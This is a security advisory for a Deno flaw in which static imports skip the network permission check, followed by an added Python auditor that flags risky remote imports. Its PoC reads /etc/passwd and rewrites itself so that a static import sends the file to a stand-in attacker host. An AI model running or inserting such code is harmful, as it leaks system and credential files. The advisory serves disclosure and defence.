
CVE-2024-21486 deno

Package

Manager: cargo
Name: deno
Vulnerable Version: >=0 <2.0.0

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N

EPSS: N/A (percentile: N/A)

Details

Deno vulnerable to Exposure of Sensitive Information to an Unauthorized Actor

### Summary

Static imports are exempted from the network permission check. An attacker could exploit this to leak the password file on the network.

### Details

Static imports in Deno are exempted from the network permission check. This can be exploited by attackers in multiple ways when third-party code is directly or indirectly executed with `deno run`:

1. The simplest payload would be a tracking-pixel-like import that attackers place in their code to find out when developers use the attacker-controlled code.
2. When `--allow-write` and `--allow-read` permissions are given, an attacker can perform a sophisticated two-step attack: first, they generate a ts/js file containing a static import, and in a second execution they load this static file.

### PoC

```ts
// The module rewrites itself so that its first line becomes a static import whose
// URL carries the contents of /etc/passwd; that import is resolved on the next run.
const __filename = new URL("", import.meta.url).pathname;
let oldContent = await Deno.readTextFile(__filename);
let passFile = await Deno.readTextFile("/etc/passwd");
let pre = 'import {foo} from "https://attacker.com?val=' + encodeURIComponent(passFile) + '";\n';
await Deno.writeTextFile(__filename, pre + oldContent);
```

Executing a file containing this payload twice with `deno run --allow-read --allow-write` would cause the password file to leak on the network, even though no network permission was granted.

This vulnerability was fixed with the addition of the `--allow-import` flag: https://docs.deno.com/runtime/fundamentals/security/#network-access
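A defender-side check for the pattern above, added here as an example and not taken from the advisory or the Deno project: it lists the remote module specifiers a source file would fetch through static imports (the requests the pre-fix network permission check never saw), compares their hosts against an allowlist in the spirit of `--allow-import`, and flags specifiers whose query string could carry data off the machine. The sample source and the allowlist are constructed for the example.

```python
import re
from urllib.parse import urlparse

# Only static import / export-from declarations are matched, since those are
# resolved (and fetched) at module load time. Dynamic import() calls are ignored.
FROM_SPEC = re.compile(r'\bfrom\s*["\']([^"\']+)["\']')
SIDE_EFFECT_IMPORT = re.compile(r'^\s*import\s*["\']([^"\']+)["\']', re.MULTILINE)

# Constructed sample module: one local import, two imports from an allowed host,
# a jsr: specifier, a dynamic import, and one remote import whose query string
# carries a payload, mirroring the advisory's exfiltration pattern.
SAMPLE_SOURCE = """\
import { join } from "https://deno.land/std@0.224.0/path/mod.ts";
import { helper } from "./lib/helper.ts";
import "https://deno.land/std@0.224.0/dotenv/load.ts";
import {foo} from "https://collector.example?val=PLACEHOLDER-ENCODED-DATA";
export { bar } from "jsr:@std/assert";
const lazy = await import("https://cdn.example/lazy.ts");
"""

# Constructed allowlist (an assumption for this example, not Deno's defaults).
EXAMPLE_ALLOWED_HOSTS = {"deno.land"}


def static_import_specifiers(source: str) -> list[str]:
    """Return every module specifier pulled in by a static import or export-from."""
    return FROM_SPEC.findall(source) + SIDE_EFFECT_IMPORT.findall(source)


def audit_static_imports(source: str, allowed_hosts: set[str]) -> list[dict]:
    """Describe each http(s) static import: its host, whether the host is
    allowlisted, and whether the URL carries a query string (possible data exfil)."""
    findings = []
    for spec in static_import_specifiers(source):
        url = urlparse(spec)
        if url.scheme not in ("http", "https"):
            continue  # relative paths and jsr:/npm: specifiers are out of scope here
        host = url.hostname or ""
        findings.append({
            "specifier": spec,
            "host": host,
            "allowed": host in allowed_hosts,
            "carries_query": bool(url.query),
        })
    return findings


def blocked_hosts(source: str, allowed_hosts: set[str]) -> list[str]:
    """Hosts a static import would contact that the allowlist does not permit."""
    return sorted({f["host"] for f in audit_static_imports(source, allowed_hosts)
                   if not f["allowed"]})
```

Running the audit over `SAMPLE_SOURCE` with `EXAMPLE_ALLOWED_HOSTS` reports `collector.example` as the only blocked host, with its query string flagged.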

Metadata

Created: 2025-06-05T01:21:08Z
Modified: 2025-06-05T01:21:08Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-jv4x-jv3h-qff5/GHSA-jv4x-jv3h-qff5.json
CWE IDs: ["CWE-200"]
Alternative ID: GHSA-jv4x-jv3h-qff5
Finding: F017
Auto approve: 1